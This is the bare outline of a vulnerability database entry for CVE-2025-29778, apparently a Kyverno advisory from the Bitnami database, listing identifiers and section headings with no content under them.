CVE-2025-29778 (GCVE-0-2025-29778)

FKIE_CVE-2025-29778

GHSA-46MP-8W32-6G94

Summary

Details

PoC

Impact

P.S.

bit-kyverno-2025-29778

Vulnerability from bitnami_vulndb

Tags

Sightings

Nomenclature